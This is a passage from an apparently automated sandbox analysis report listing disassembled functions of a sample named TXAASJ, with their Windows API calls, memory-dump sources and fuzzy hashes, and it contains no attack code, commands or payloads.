                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4156661090-0
                                                                                                                        • Opcode ID: 79e97d29a138a099f03a01eaed078d58768d8a66e8d2916470dfdb4454a02b68
                                                                                                                        • Instruction ID: 4d97ff788d19c304cec570b7a67067a817b7a9a603f82ea64b052adb21d41bf4
                                                                                                                        • Opcode Fuzzy Hash: 79e97d29a138a099f03a01eaed078d58768d8a66e8d2916470dfdb4454a02b68
                                                                                                                        • Instruction Fuzzy Hash: 44219375A00204AFDB00EF65DD85AAA7BF9EF49305F148479E95AEB351CB70ED04CBA0
                                                                                                                        Function 00E6B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E6B5EB
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00E6B5FA
                                                                                                                        • BeginPath.GDI32(?), ref: 00E6B611
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00E6B63B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3225163088-0
                                                                                                                        • Opcode ID: 279d91fad0b492065d320e083863932067cedaec91feba3f493866eeeb18976c
                                                                                                                        • Instruction ID: beb4665b272441ce0139c0b9b58aea1d67b0541b8f8fe27e6fd49449e928e61a
                                                                                                                        • Opcode Fuzzy Hash: 279d91fad0b492065d320e083863932067cedaec91feba3f493866eeeb18976c
                                                                                                                        • Instruction Fuzzy Hash: 9C21797084130DEFDB109F19FD48BED7BE9FB003A9F15C12AEA15A61A0C37188DA9B50
                                                                                                                        Function 00E72E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __calloc_crt.LIBCMT ref: 00E72E81
                                                                                                                        • CreateThread.KERNEL32(?,?,00E72FB7,00000000,?,?), ref: 00E72EC5
                                                                                                                        • GetLastError.KERNEL32 ref: 00E72ECF
                                                                                                                        • _free.LIBCMT ref: 00E72ED8
                                                                                                                        • __dosmaperr.LIBCMT ref: 00E72EE3
                                                                                                                          • Part of subcall function 00E7889E: __getptd_noexit.LIBCMT ref: 00E7889E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2664167353-0
                                                                                                                        • Opcode ID: 4c718c1d5d7647f131b4010f54808731bd6e27a1c085c06cc5997361637568fa
                                                                                                                        • Instruction ID: eb7f58f3d89f8bab4a7e0099622a6d97a58126412e26ef39a850c3ad0f26740b
                                                                                                                        • Opcode Fuzzy Hash: 4c718c1d5d7647f131b4010f54808731bd6e27a1c085c06cc5997361637568fa
                                                                                                                        • Instruction Fuzzy Hash: 41110832104306AFE715AFA59C46DAB3BE8EF04774710942EFB5CF6151DB31C8008761
                                                                                                                        Function 00E8B8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E8B903
                                                                                                                        • GetLastError.KERNEL32(?,00E8B3CB,?,?,?), ref: 00E8B90D
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00E8B3CB,?,?,?), ref: 00E8B91C
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00E8B3CB,?,?,?), ref: 00E8B923
                                                                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E8B93A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 842720411-0
                                                                                                                        • Opcode ID: 2e02e2563aa58f49775279cc44ba50afabaf09f99673359d16fbbd30632de2f9
                                                                                                                        • Instruction ID: 6a09d88dbf5c4320f6a8b95296d827b5825ae0267d1e561ace9725c86f4c3a4e
                                                                                                                        • Opcode Fuzzy Hash: 2e02e2563aa58f49775279cc44ba50afabaf09f99673359d16fbbd30632de2f9
                                                                                                                        • Instruction Fuzzy Hash: 8D016D71202248BFDB115FA6EC88D6B3FADEF8A768B10002AF549E6150DB71CC44DB60
                                                                                                                        Function 00E98355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E98371
                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E9837F
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E98387
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E98391
                                                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E983CD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2833360925-0
                                                                                                                        • Opcode ID: d9934cd93c73c4ac86f6af11a96965e13f1a73a867dcc90976b4f6e4dd109d11
                                                                                                                        • Instruction ID: 6c04c65fad8696f5e713bfe2667146f7dd26a48a5a11541f26b9ee7224a64ea2
                                                                                                                        • Opcode Fuzzy Hash: d9934cd93c73c4ac86f6af11a96965e13f1a73a867dcc90976b4f6e4dd109d11
                                                                                                                        • Instruction Fuzzy Hash: CF012931D06629DFCF00EFA5EE49AEEBB78FB09B11F001056E941B2160DF70955587A1
                                                                                                                        Function 00E8A857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CLSIDFromProgID.OLE32 ref: 00E8A874
                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 00E8A88F
                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00E8A89D
                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00E8A8AD
                                                                                                                        • CLSIDFromString.OLE32(?,?), ref: 00E8A8B9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3897988419-0
                                                                                                                        • Opcode ID: a2fabca6523e3dc4cc31203bf38c4964d00c5265b11340df2ea74fc3d53c6ce8
                                                                                                                        • Instruction ID: 13d10e1e241905863b048a0e0b593be47abc2ccad77cf6d9a56a9a7cacd43142
                                                                                                                        • Opcode Fuzzy Hash: a2fabca6523e3dc4cc31203bf38c4964d00c5265b11340df2ea74fc3d53c6ce8
                                                                                                                        • Instruction Fuzzy Hash: CA01DF7A601204AFEB096F15EC48BAA7BEDEF44391F184036B809F2210D730DD059BB1
                                                                                                                        Function 00E8B7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E8B806
                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E8B810
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E8B81F
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E8B826
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E8B83C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 44706859-0
                                                                                                                        • Opcode ID: ca91a5ac62735654487efd5baf0cdd4ecebc8b97b0da6dcd9e08247c89dbeec3
                                                                                                                        • Instruction ID: 1f058dc54c940ecc2d55fcdbe916ca4a98c314262da560129297a7a4128d22a2
                                                                                                                        • Opcode Fuzzy Hash: ca91a5ac62735654487efd5baf0cdd4ecebc8b97b0da6dcd9e08247c89dbeec3
                                                                                                                        • Instruction Fuzzy Hash: 37F04F752462047FEB212FA6FC88E673B6DFF46768F00402AF949EB150CB609845CB60
                                                                                                                        Function 00E8B78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E8B7A5
                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E8B7AF
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E8B7BE
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E8B7C5
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E8B7DB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 44706859-0
                                                                                                                        • Opcode ID: 916b5cee4a2e8aa6e8ebd6e0372c96ac37ada1311709f865edb6ed1b2ee05628
                                                                                                                        • Instruction ID: 43ed44397625225dc7d63bb2adc5327530fcf8144af5ecb405694ef340bdb39a
                                                                                                                        • Opcode Fuzzy Hash: 916b5cee4a2e8aa6e8ebd6e0372c96ac37ada1311709f865edb6ed1b2ee05628
                                                                                                                        • Instruction Fuzzy Hash: 71F0AF712423047FEB102FA6AC88E673BADFF86B59F00411BF908E7151CB619C058B60
                                                                                                                        Function 00E8FA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00E8FA8F
                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E8FAA6
                                                                                                                        • MessageBeep.USER32(00000000), ref: 00E8FABE
                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 00E8FADA
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00E8FAF4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3741023627-0
                                                                                                                        • Opcode ID: 5d4fa570fcce1f843a23049537ec2edc61ea0bb39e4dddc670833e061c40f173
                                                                                                                        • Instruction ID: d50aa7bfe6a8e3841030c52da10596e0780bbd3f4c24cb0811dae426edfdc1ab
                                                                                                                        • Opcode Fuzzy Hash: 5d4fa570fcce1f843a23049537ec2edc61ea0bb39e4dddc670833e061c40f173
                                                                                                                        • Instruction Fuzzy Hash: E9016230504704AFEB24AB21ED4EB9677BCFB00719F0416AAE58FB50E0DBE0A9488B40
                                                                                                                        Function 00E6B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EndPath.GDI32(?), ref: 00E6B526
                                                                                                                        • StrokeAndFillPath.GDI32(?,?,00ECF583,00000000,?), ref: 00E6B542
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00E6B555
                                                                                                                        • DeleteObject.GDI32 ref: 00E6B568
                                                                                                                        • StrokePath.GDI32(?), ref: 00E6B583
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2625713937-0
                                                                                                                        • Opcode ID: 930297ae167dd9768ae6448878f440c72207053bb030a28500df353e8bee1ae4
                                                                                                                        • Instruction ID: c59f80f9bc22d8fd953c4711a950e6992ba2ef32d5c769c986d30c25f7b9465d
                                                                                                                        • Opcode Fuzzy Hash: 930297ae167dd9768ae6448878f440c72207053bb030a28500df353e8bee1ae4
                                                                                                                        • Instruction Fuzzy Hash: 40F0B630046208AFDB155F29FD087E43FA6F701376F19D215E5A6A41F0C7318999EF50
                                                                                                                        Function 00E9FA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00E9FAB2
                                                                                                                        • CoCreateInstance.OLE32(00EDDA7C,00000000,00000001,00EDD8EC,?), ref: 00E9FACA
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • CoUninitialize.OLE32 ref: 00E9FD2D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                        • String ID: .lnk
                                                                                                                        • API String ID: 2683427295-24824748
                                                                                                                        • Opcode ID: 60399b7ce68d7609ce42a1f4081546e407e9c6cdabd724cbcc7dd0cacd831233
                                                                                                                        • Instruction ID: 664decb2687554b4c01a14211e8668f3a8e7ca3830e2b919dd6dff212fc1e4fb
                                                                                                                        • Opcode Fuzzy Hash: 60399b7ce68d7609ce42a1f4081546e407e9c6cdabd724cbcc7dd0cacd831233
                                                                                                                        • Instruction Fuzzy Hash: 61A14971508305AFC700EF64CC91EABB7ECEF88704F40591DB556A7292EB70EA09CB92
                                                                                                                        Function 00E9EFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E978AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00E978CB
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00E9F04D
                                                                                                                        • CoCreateInstance.OLE32(00EDDA7C,00000000,00000001,00EDD8EC,?), ref: 00E9F066
                                                                                                                        • CoUninitialize.OLE32 ref: 00E9F083
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                        • String ID: .lnk
                                                                                                                        • API String ID: 2126378814-24824748
                                                                                                                        • Opcode ID: 10099054e13eed8253141a52673526c0eae60af5061cf8fe39772d30310b3149
                                                                                                                        • Instruction ID: 648194e89a4394c00c9779f23088ec72f5176e09ada902187a361ff7e6f06912
                                                                                                                        • Opcode Fuzzy Hash: 10099054e13eed8253141a52673526c0eae60af5061cf8fe39772d30310b3149
                                                                                                                        • Instruction Fuzzy Hash: 27A168356043019FCB14DF14C884D5ABBE5FF88324F148959F99AAB3A2CB31ED49CB91
                                                                                                                        Function 00E73EED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00E73F7D
                                                                                                                          • Part of subcall function 00E7EE80: __87except.LIBCMT ref: 00E7EEBB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorHandling__87except__start
                                                                                                                        • String ID: pow
                                                                                                                        • API String ID: 2905807303-2276729525
                                                                                                                        • Opcode ID: 8be7ede5720d41359cf73ee820f2a474f89eb29d6d657f33c2c560b32f599b71
                                                                                                                        • Instruction ID: 89b8ae526cfd5327896e0fb2cf840d96fb5650c9595b34658d2f4d21a2d9f152
                                                                                                                        • Opcode Fuzzy Hash: 8be7ede5720d41359cf73ee820f2a474f89eb29d6d657f33c2c560b32f599b71
                                                                                                                        • Instruction Fuzzy Hash: 03516A61F0820686CB197B38D9413FA2BE49B40744F20FD69F09DB53EADB358D88A647
                                                                                                                        Function 00E6DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: #$+
                                                                                                                        • API String ID: 0-2552117581
                                                                                                                        • Opcode ID: 5dd1b1aebaab99a70b77b20e5c92fe34bea84a28429adedd1f45085a41f81e4d
                                                                                                                        • Instruction ID: 1e6de6051b046561596c93c03f2c512354032b9f4bae90fa24c2fffd89243311
                                                                                                                        • Opcode Fuzzy Hash: 5dd1b1aebaab99a70b77b20e5c92fe34bea84a28429adedd1f45085a41f81e4d
                                                                                                                        • Instruction Fuzzy Hash: 0B5121B56082458FDB19EF68D861BF97BA4EF16314F146059FC81BB2E1D7319C46C720
                                                                                                                        Function 00E9503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00EEDC40,?,0000000F,0000000C,00000016,00EEDC40,?), ref: 00E9507B
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                          • Part of subcall function 00E5B8A7: _memmove.LIBCMT ref: 00E5B8FB
